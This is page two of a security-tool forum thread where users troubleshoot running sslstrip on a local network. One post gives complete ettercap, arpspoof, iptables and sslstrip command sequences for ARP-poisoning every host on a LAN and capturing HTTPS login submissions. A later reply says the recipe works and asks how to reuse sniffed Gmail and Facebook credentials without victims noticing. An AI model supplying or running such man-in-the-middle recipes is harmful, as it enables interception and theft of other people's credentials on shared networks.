Page 2 of 2 FirstFirst 12
Results 11 to 19 of 19

Thread: Sslstrip in a lan - Problems !

  1. #11
    Senior Member voidnecron's Avatar
    Join Date
    May 2010
    Posts
    132

    Default Re: Sslstrip in a lan - Problems !

    Yeah, the step between beginner and expert is too big, a 'moderate/general questions' topic might be handy.
    Mods? An good idea or not welcome?
    "The difference between RAID1 and RAID0 is that the zero stands for how many files you're gonna have after a harddisk failure."

  2. #12
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Sslstrip in a lan - Problems !

    Quote Originally Posted by voidnecron View Post
    Yeah, the step between beginner and expert is too big, a 'moderate/general questions' topic might be handy.
    Mods? An good idea or not welcome?
    BackTrack 5 General Topics maybe ? Don't tell me you didn't see that ! You just have to scroll down a little more than usual
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  3. #13
    Just burned his ISO
    Join Date
    Oct 2010
    Location
    India
    Posts
    3

    Default Re: Sslstrip in a lan - Problems !

    Quote Originally Posted by michelinok View Post
    Hi Carto
    Just one question...is it possible to have multiple victims or not in arpspoof? (I mean 2 or 3 <ipvictim>)
    Any idea?
    Yes, i guess you could even arpspoof entire lan by placing just "//" in the place of "/victimip/".
    Hope it works.

  4. #14
    Senior Member
    Join Date
    Jul 2011
    Posts
    236

    Lightbulb Re: Sslstrip in a lan - Problems ! "You've got problems, I've got an Answer" Pffbt

    Alright,

    This plays awesomely into what will be my first thread (Posted shortly after I type this response up)

    So,

    I've seen so many places on this forum where people have issues MITMing. The cause? ----> The user is a "re-tard" RTFM. <---- I'll admit when i first started playing around I wanted quick answers, so I would hop on IRC and try to get somebody to do the manual reading for me. That was okay then for me, but it made ME look like an idiot and a lazy, because I was, I was too lazy to read a small man page or do some googling to figure the question out for myself. Now, I'm not saying never ask, cuz there are definately times when I ask, cuz I need an answer right then and there, and dont have the time to read man pages or google; it's just I try to limit them now, as opposed to 2 years ago when i first started *nix'ing it up.

    Okay, Enuf ranting, had to get that out, take it for what it's worth.

    Now, ON to the solution.

    While there are a myriad of programs out there which probably do packet forwarding, the two I come across the most revolve around Ettercap-NG and the kernel itself

    -------------------------------------------------------------
    If you decide to invoke: echo 1 > /proc/sys/net/ipv4/ip_forward

    **MAKE SURE**

    That you invoke the -u option for Ettercap

    ---OTHERWISE---

    Packets get double forwarded........ causing confusion and possible self awareness, leading to Skynets Awakening and eventually Judgement Day.....


    If you do not use the: -u flag for ettercap, then ettercap will forward the packets for you.
    --------------------------------------------------------------------------------------


    V/r,
    Snafu
    Pffbt....

  5. #15
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    19

    Default Re: Sslstrip in a lan - Problems !

    @Carto_ iv'e experienced the same problem, sometimes wireless can or could cause packet loss, i also did mine wireless and sometimes it will cry and say "Network shutting down" or it would stop ARP Spoofing and would time out ect, (Im using a nice wireless card aswell) Soo try it via a LAN Cable n see if it helps.

    my issue is my ssl strip dosnt seem to wanna log HTTPs Trafic and 9/10 it will either not work at all or display all the http junk and headers, thats it.

  6. #16
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Re : Sslstrip in a lan - Problems !

    Do this:
    terminal 1:
    ettercap -Tqi "iface" -M arp:remote // /GW/ -P autoadd (this way, every machines that connects after ettercap launced, will be added to host automatically and spoofed)
    remember to use key "q" to quit ettercap..This way all hosts will be re-arped..Otherway, if you use ctl z, you will mess the arps and lan will be messed up.

    termina 2:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
    sslstrip -p -f (default is -p which is only ssl posts, you do not need so much info in sslstrip.log)
    Use ctl z to stop sslstrip.

    Or you can use:
    terminal 1:
    forward traffic manually (echo 1 > ........)
    arpspoof -i "iface" -t "target" "gw"
    ettercap -Tqi "iface" -u (this way, won't forward traffic, that will be your responsability)
    remember to use key "q" to quit ettercap..This way all hosts will be re-arped..Otherway, if you use ctl z, you will mess the arps and lan will be messed up.

    termina 2:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
    sslstrip -p -f (default is -p which is only ssl posts, default port is 10000, you do not need so much info in sslstrip.log, only ssl posts)
    Use ctl z to stop sslstrip.

    In method 1, you need to uncomment "iptables" section in etter.conf and change the id's in the first lines: to "0" if BT5, and your id (your id) if using ettercap installed in some other linux distro (debian, Ubuntu, etc)..
    Hope this helps....

  7. #17
    Just burned his ISO
    Join Date
    Jun 2011
    Posts
    5

    Default Re: Sslstrip in a lan - Problems !

    i have ready install sll strip but it not work..
    i think it should wrong strip....

  8. #18
    Just burned his ISO
    Join Date
    Nov 2011
    Posts
    3

    Default Re: Sslstrip in a lan - Problems !

    @maverik35, your recipe work nice.
    https login sites, such as, gmail.com, facebook.com etc, doesn't login users after credentials given. Is there any way to pass sniffed credentials and login user?
    When they refuse to login, users will notice that something is wrong...

  9. #19
    Junior Member
    Join Date
    May 2011
    Location
    Paradise
    Posts
    28

    Default Re: Sslstrip in a lan - Problems !

    Make sure you are using the newest version of sslstrip.. moxie fixed some stuff in version 9 relating to gmail/facebook etc login issues.. newest versions are available from thoughtcrime.org.. hope that helps!

Page 2 of 2 FirstFirst 12

Similar Threads

  1. sslstrip help
    By rogue040 in forum OLD BackTrack 4 Software Related Issues
    Replies: 0
    Last Post: 03-29-2010, 02:42 AM
  2. problems with arpspoof, sslstrip, ettercap
    By username324 in forum Beginners Forum
    Replies: 9
    Last Post: 03-12-2010, 12:02 AM
  3. sslstrip v0.7
    By Mr-Protocol in forum Tool Requests
    Replies: 2
    Last Post: 01-18-2010, 06:33 AM
  4. sslstrip
    By muminrz in forum OLD BT4 Feature Requests
    Replies: 1
    Last Post: 02-28-2009, 03:25 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •